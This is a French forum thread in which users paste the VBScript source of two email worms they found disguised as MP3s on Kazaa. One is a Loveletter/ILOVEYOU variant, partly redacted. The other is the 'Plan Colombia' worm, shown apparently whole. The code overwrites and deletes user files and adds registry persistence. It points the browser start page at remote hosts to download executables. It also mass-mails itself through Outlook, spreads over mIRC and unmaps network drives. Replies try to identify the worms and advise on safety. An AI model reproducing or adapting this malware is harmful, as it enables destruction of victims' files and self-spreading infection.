Aller au contenu
DraZarD

Virus VBS ... ?

Messages recommandés

jai telecheger un morceau , soit sisant en MP3 et kan je suis aller voir dans mon dossier , il etait sous forme d'un fichier VBS :P

Sans le savoir je les lancer via linterface de Kazaa alors , je ne c pas si il la ouvert ou pas , ou tou cas si oui , jaimerais que vous me disier quesque je risque et quesque je doit faire :-P

je file donc les codes avec qqe trou pour que des petit malin ne samuse pas avec :-( :

 

rem  barok -loveletter(vbe) <i hate go to school>

rem    by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=""

( TROOOOOUUU PAR DRAZARD !!! )

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

( TROOOUUU PAR DRAZARD !!! )  

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"MSKernel32.vbs")

c.Copy(dirwin&"Win32DLL.vbs")

c.Copy(dirsystem&"Very Funny.vbs")

regruns()

html()

spreadtoemail()

listadriv()

( TROOOOOUUUU  PAR DRAZARD !! )  

sub regruns()

On Error Resume Next

Dim num,downread

regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32",dirsystem&"MSKernel32.vbs"

regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL",dirwin&"Win32DLL.vbs"

downread=""

downread=regget("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory")

if (downread="") then

downread="c:"

end if

if (fileexist(dirsystem&"WinFAT32.exe")=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"

elseif num = 2 then

regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"

elseif num = 3 then

regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"

elseif num = 4 then

regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"

end if

end if

if (fileexist(downread&"WIN-BUGSFIX.exe")=0) then

regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunWIN-BUGSFIX",downread&"WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","about:blank"

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&"")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)  

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&""&bname&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="jpg") or (ext="jpeg") then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

TROOOOOUUUUUUU !!!! ( par drazard !! )

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&".vbs")

fso.DeleteFile(f1.path)

elseif(ext="mp3") or (ext="mp2") then

set mp3=fso.CreateTextFile(f1.path&".vbs")

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then

set scriptini=fso.CreateTextFile(folderspec&"script.ini")

scriptini.WriteLine "[script]"

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"

scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0=on 1:JOIN:#:{"

scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"

scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"Very Funny.HTM"

scriptini.WriteLine "n3=}"

scriptini.close

eq=folderspec

end if

end if

next  

end sub

sub folderlist(folderspec)  

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)  

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next  

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"&malead)

if (regad="") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = "fwd: Joke"

male.Body = vbcrlf&""

male.Attachments.Add(dirsystem&"Very Funny.vbs")

male.Send

regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&malead,1,"REG_DWORD"

end if

x=x+1

next

regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count

else

regedit.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _

"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _

"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _

"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _

"<!--?-??-?"&vbcrlf& _

"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"&vbcrlf& _

"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

"<!--"&vbcrlf& _

"on error resume next"&vbcrlf& _

"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

"aw=1"&vbcrlf& _

"code="

dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _

"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _

"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _

"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _

"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _

"wri.write code4"&vbcrlf& _

"wri.close"&vbcrlf& _

"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _

"if (err.number=424) then"&vbcrlf& _

"aw=0"&vbcrlf& _

"end if"&vbcrlf& _

"if (aw=1) then"&vbcrlf& _

"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _

"window.close"&vbcrlf& _

"end if"&vbcrlf& _

"end if"&vbcrlf& _

"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _

"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _

"?-??-?-->"&vbcrlf& _

"<?-?SCRIPT>"

dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

dt5=replace(dt4,chr(94)&chr(45)&chr(94),"")

dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

dt6=replace(dt3,chr(94)&chr(45)&chr(94),"")

set fso=CreateObject("Scripting.FileSystemObject")

set c=fso.OpenTextFile(WScript.ScriptFullName,1)

lines=Split(c.ReadAll,vbcrlf)

l1=ubound(lines)

for n=0 to ubound(lines)

lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

lines(n)=replace(lines(n),"",chr(37)+chr(45)+chr(37))

if (l1=n) then

lines(n)=chr(34)+lines(n)+chr(34)

else

lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"

end if

next

set b=fso.CreateTextFile(dirsystem+"Very Funny.HTM")

b.close

set d=fso.OpenTextFile(dirsystem+"Very Funny.HTM",2)

d.write dt5

d.write join(lines,vbcrlf)

d.write vbcrlf

d.write dt6

d.close

end sub

Partager ce message


Lien à poster
Partager sur d’autres sites

heu, juste a vu d oeil , par le debut

"GRAMMERSoft Group / Manila,Philippines"

et

"-loveletter(vbe) <i hate go to school> "

je crois que c'est "I Love U" car je l'avais exploreé une fois pour voir comment c'etait fait et je crois que ça ressemblait à ça !

Desole mais je suis pratiquement sur !

Partager ce message


Lien à poster
Partager sur d’autres sites
:P et kelle etait les effect de i love you ?? pour linstant jai pas encore booter , les effet arrive t'il apres avoir booter ?? si oui , comment faire pour lenrayer avant ?

Partager ce message


Lien à poster
Partager sur d’autres sites

ok

les effets etaient que tout les mp3 et les mpg et videos ,, etaient effaces,, pour le corriger essaye sur cette adresse d'antivirus http://www.sophos.com ils sont pas mal et ça pourrait t'aider,, a ta place je ne rebouterais pas car il a agit dans la base de registre !

ou alors d'ici quelques minutes , les effets vont se faire ressentir.

Ceci dit si KaZaa la activez mais pour son identite jen suis pratiquement sur !

a+

Partager ce message


Lien à poster
Partager sur d’autres sites

Grr alors c i love you !!

ouf , c bon ja pas etait infecté :P

G deja eyx ce virus qui vire les MP3 et le JPG et il c'est executer tout de suite donc c bon , je lai pas lancer :-(

Partager ce message


Lien à poster
Partager sur d’autres sites

heu jai pas compris !

mais bon, cest soit IloveYou soit une erreur de ma part !

bon bref , je te laisse.

jespere que l 'on te vera demain, sinon on saura d'ou provient ton abscence ! lol je rigole!

et puis en relisant je me suis apercu qu'il ny a pas de doute, c'est bien IloveU :

"open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main"

donc a toi de voir !!

n empeche, le gars qui a ecrit ça etait fort !!

car il fait des liens a IRC et il integre de ces trucs dans un VBS ,, incroyable ,, bref,

a+

Partager ce message


Lien à poster
Partager sur d’autres sites

Je crois que ce soir , les VBS virus sur kazaa son a la mode , je vien de DL un autre !

( petit conseil , kan vous prener un fichier de 10 ou 15 ko en .mp3 aller verifier avant de le lancer ... :P

Bon je file kan meme les codes je suis curieux de savoir ce qu'il fait :-P

 

rem  ===============================================================================================

rem  "Plan Colombia" virus v1.0

rem  by Sand Ja9e Gr0w   (www.colombia.com)

 

rem  Dedicated to all the people that want to be hackers or crackers, in Colombia  

rem  This program is also a protest act against the violence and corruption that Colombia lives...

rem  I always wanting that all this finishes, I have said...

 

 

rem  Santa fe de Bogotá 2000/09

rem  I dedicate to all you the song "GoodBye" of Andreas Bochelli

rem  =================================================================================================

 

 

rem  Thanks God..!

rem  A greeting for "Lina María" from "Santa fe de Bogotá"

rem  A greeting for "Tizo" from "Spain"

rem  And One kicked of tail to my friends, "eL ChE" and "ThE SpY"

 

rem  okay, ok...  

rem  my baby start here...

 

 

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,polyn,numero,polye

eq=""

ctr=0

 

randomize

numero = Int(Rnd * 3) + 1

polye = ".GIF.vbs"

If numero = 1 Then

 polye = ".BMP.vbs"

Else

 If numero = 2 Then

   polye = ".JPG.vbs"

 End If

End If

 

 

polyn=""&polyname(Int(Rnd * 5) + 4)&polye

 

Set fso = CreateObject("Scripting.FileSystemObject")

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

If Day(Now) = 17 And Month(Now) = 9 Then

 MsgBox "Dedicated to my best brother=>Christiam Julian(C.J.G.S.)" & Chr(13) & "Att.  " & polyname(5) & "   (M.H.M. TEAM)"

 killnet()

End If

 

 

 

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject("WScript.Shell")

rr=wscr.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout")

if (rr>=1) then

wscr.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout",0,"REG_DWORD"

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&"LINUX32.vbs")

c.Copy(dirwin&"reload.vbs")

c.Copy(dirsystem&polyn)

regruns()

html()

spreadtoemail()

listadriv()

end sub

 

 

 

sub regruns()

On Error Resume Next

Dim num,downread,res

regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunLINUX32",dirsystem&"LINUX32.vbs"

regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesreload",dirwin&"reload.vbs"

downread=""

downread=regget("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory")

if (downread="") then

 downread="c:"

end if

 

rem   acepta nombres largos..?

if (fileexist(dirsystem&"WinFAT32.exe")=1) then

 Randomize

 Randomize

 num = Int((4 * Rnd) + 1)

 

 rem  fatal => send virii

 if num = 2 then  

   regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://members.fortunecity.com/plancolombia/macromedia32.zip"

  else

   rem  oh,, a picture.. nice :-P  

   if num = 3 then

       regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://members.fortunecity.com/plancolombia/linux321.zip"        

     else

      rem  oh,, other picture  =:-P)

      if num = 4 then

        regcreate "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page","http://members.fortunecity.com/plancolombia/linux322.zip"

      end if  

   end if  

end if

end if

 

if (fileexist(downread&"MACROMEDIA32.zip")=0) then

 res = Shell("copy " & downread & "MACROMEDIA32.zip  " & dirwin & "important_note.txt", vbHide)

 regcreate "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunplan colombia",dirwin&"important_note.txt"

 regcreate "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","about:blank"

else

 if (fileexist(downread&"linux321.zip")=0) then

    Kill (dirwin & "logos.sys")

    res = Shell("copy " & downread & "linux321.zip  " & dirwin & "logos.sys", vbHide)

    regcreate "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","about:blank"      

   else

     if (fileexist(downread&"linux322.zip")=0) then

       Kill (dirwin & "logow.sys")

       res = Shell("copy " & downread & "linux322.zip  " & dirwin & "logow.sys", vbHide)  

       regcreate "HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page","about:blank"      

     end if    

 end if

end if

end sub

 

 

 

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

 

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

 folderlist(d.path&"")

end if

Next

 

listadriv = s

end sub

 

 

 

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

 

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext="vbs") or (ext="vbe") then

 set ap=fso.OpenTextFile(f1.path,2,true)

 ap.write vbscopy

 ap.close

else

 if(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")  or (ext="hta") then

  set ap=fso.OpenTextFile(f1.path,2,true)

  ap.write vbscopy

  ap.close

  bname=fso.GetBaseName(f1.path)

  set cop=fso.GetFile(f1.path)

  cop.copy(folderspec&""&bname&".vbs")

  fso.DeleteFile(f1.path)  

else

 if(ext="jpg") or (ext="jpeg") then

  set ap=fso.OpenTextFile(f1.path,2,true)

  ap.write vbscopy

  ap.close

  set cop=fso.GetFile(f1.path)

  cop.copy(f1.path&".vbs")

  fso.DeleteFile(f1.path)  

else

 if(ext="mp3") or (ext="mp2") then

  set mp3=fso.CreateTextFile(f1.path&".vbs")

  mp3.write vbscopy

  mp3.close

  set att=fso.GetFile(f1.path)

  att.attributes=att.attributes+2

end if

end if

end if

end if

next

 

end sub

 

 

 

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

 

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

 

end sub

 

 

sub regcreate(regkey,regvalue)

Set regedit = CreateObject("WScript.Shell")

regedit.RegWrite regkey,regvalue

end sub

 

 

function regget(value)

Set regedit = CreateObject("WScript.Shell")

regget=regedit.RegRead(value)

end function

 

 

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

 msg = 0

else

 msg = 1

end if

fileexist = msg

end function

 

 

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

 

 

 

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,correoad,b,regedit,regv,regad,textosub,textobod

 

set regedit=CreateObject("WScript.Shell")

set out=WScript.CreateObject("Outlook.Application")

set mapi=out.GetNameSpace("MAPI")

 

Randomize

numero = Int(Rnd * 3) + 1

textosub = ""

If numero = 1 Then

 textosub = "US PRESIDENT AND FBI SECRETS =PLEASE VISIT => (http://WWW.2600.COM)<="

Else

 If numero = 2 Then

   textosub = polyname(6)

 End If

End If

 

 

Randomize

numero = Int(Rnd * 3) + 1

textobod = ""

If numero = 1 Then

 textobod = "VERY JOKE..! SEE PRESIDENT AND FBI TOP SECRET PICTURES.."

Else

 If numero = 2 Then

   textobod = polyname(10)

 End If

End If

 

 

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a)

if (regv="") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

 

 for ctrentries=1 to a.AddressEntries.Count

  correoad=a.AddressEntries(x)

  regad=""

  regad=regedit.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"&correoad)

  if (regad="") then

    set correo=out.CreateItem(0)

    correo.Recipients.Add(correoad)

    correo.Subject = textosub

    correo.Body = vbcrlf&textobod

    correo.Attachments.Add(dirsystem&polyn)

    correo.Send

    regedit.RegWrite  "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&correoad,1,"REG_DWORD"

  end if

    x=x+1

 next

 

 regedit.RegWrite  "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count

else

  regedit.RegWrite  "HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count

end if

next

 

Set out=Nothing

Set mapi=Nothing

end sub

 

 

Function polyname(n)

Dim i, vector, texto, pos

on error resume next

rem polyformic ( ohhhh yeahhh...) very good polyformic engine  :-P) by Sand Ja9e Gr0w

 

vector = Array("A", "E", "I", "O", "U")

texto = ""

Randomize

For i = 1 To n

 Randomize

 rem  consonante

 texto = texto&Chr(Int((Rnd * 25) + 65))

 i = i + 1

 If i > n Then

  exit for

 end if

 rem  vocal

 texto = texto&vector(Int((Rnd * 4) + 1))

 Randomize

Next

 

polyname = texto

End Function

 

 

 

 

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1="<HTML><HEAD>"&_

"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#US-PRESIDENT-AND-FBI-SECRETS.HTM# -#,#-#main#-#)@-@ "&vbcrlf& _

"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#US-PRESIDENT-AND-FBI-SECRETS.HTM# -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _

"<CENTER><p>M.H.M TEAM <?-?p><p>Colombia<BR>- Please press #-#YES#-# button for see secret pictures<?-?p>"&vbcrlf& _

"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>Hello Colombia...! Since Here, after, since other part of World..<?-?MARQUEE> "&vbcrlf& _

"<?-?BODY><?-?HTML>"&vbcrlf& _

"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _

"<!--?-??-?"&vbcrlf& _

"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _

 "?-??-?-->"&vbcrlf& _

 "<?-?SCRIPT>"&vbcrlf& _

 "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _

 "<!--"&vbcrlf& _

 "on error resume next"&vbcrlf& _

 "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _

 "aw=1"&vbcrlf& _

 "code="

 

 dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _

 "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _

 "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _

 "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _

 "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _

 "set wri=fso.CreateTextFile(dirsystem&@-@^-^LINUX32.vbs@-@)"&vbcrlf& _

 "wri.write code4"&vbcrlf& _

 "wri.close"&vbcrlf& _

 "if (fso.FileExists(dirsystem&@-@^-^LINUX32.vbs@-@)) then"&vbcrlf& _

 "if (err.number=424) then"&vbcrlf& _

 "aw=0"&vbcrlf& _

 "end if"&vbcrlf& _

 "if (aw=1) then"&vbcrlf& _

 "document.write @-@ERROR: can#-#t load Pictures. IE internal Error@-@"&vbcrlf& _

 "window.close"&vbcrlf& _

 "end if"&vbcrlf& _

 "end if"&vbcrlf& _

 "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _

 "regedit.RegWrite  @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^LINUX32@-@,dirsystem&@-@^-^LINUX32.vbs@-@"&vbcrlf& _

 "?-??-?-->"&vbcrlf& _

 "<?-?SCRIPT>"

 

 dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")

 dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")

 dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")

 dt5=replace(dt4,chr(94)&chr(45)&chr(94),"")

 dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")

 dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")

 dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")

 dt6=replace(dt3,chr(94)&chr(45)&chr(94),"")

 set fso=CreateObject("Scripting.FileSystemObject")

 set c=fso.OpenTextFile(WScript.ScriptFullName,1)

 lines=Split(c.ReadAll,vbcrlf)

 l1=ubound(lines)

 

 for n=0 to ubound(lines)

   lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))

   lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

   lines(n)=replace(lines(n),"",chr(37)+chr(45)+chr(37))

   if (l1=n) then

     lines(n)=chr(34)+lines(n)+chr(34)

    else

     lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"

  end if

 next

 

 set b=fso.CreateTextFile(dirsystem+"US-PRESIDENT-AND-FBI-SECRETS.HTM")

 b.close

 set d=fso.OpenTextFile(dirsystem+"US-PRESIDENT-AND-FBI-SECRETS.HTM",2)

 d.write dt5

 d.write join(lines,vbcrlf)

 d.write vbcrlf

 d.write dt6

 d.close

end sub

 

 

 

sub killnet()

Dim intDrive,strDrive,WSHNetwork

 

on error resume next

 

 

Set WSHNetwork = WScript.CreateObject("WScript.Network")

 

   For intDrive = 26 To 5 Step -1        

              strDrive = Chr(intDrive + 64) & ":"        

              WSHNetwork.RemoveNetworkDrive strDrive

   Next

 

rem  bye net connection ...                 :-(

Set WSHNetwork=Nothing

 

end sub

Partager ce message


Lien à poster
Partager sur d’autres sites

lol de lol !!

je crois que tu es tombé sur "Mylife" mais jespere pour toi que tu ne la pas ouvert car lui il fait bobo !!

je suis cepandant pas sur car il y a une 10aine de dérivé de ce virus et je suis pas sur qu'il soit en VBS, notamment la dernier version en ligne ( ehhe) qui fait penser a Ariel Sharon et qui sort une derniere photo de lui, puis le pc crash, et c'est direction poubelle !

ce doit etre un de ces dérivé et ça ne m'"tonnerait point !

Et puis as tu effacer une partie de ce VBS pour pas que des malins s'amusent ???

 

PS : ne télécharge rien sur Kazaa qui fasse une taille aussi petite !

faut pas non plus divaguer ! un mp3 de 15 ko !!

et puis active le filtre contre le virus (je ne sais pas si il amrche mais c'est js ça de plus! il est dans tool->options enfin chercher ,,,)

a+

Partager ce message


Lien à poster
Partager sur d’autres sites

Votre contenu devra être approuvé par un modérateur

Invité
Vous postez un commentaire en tant qu’invité. Si vous avez un compte, merci de vous connecter.
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

Chargement

×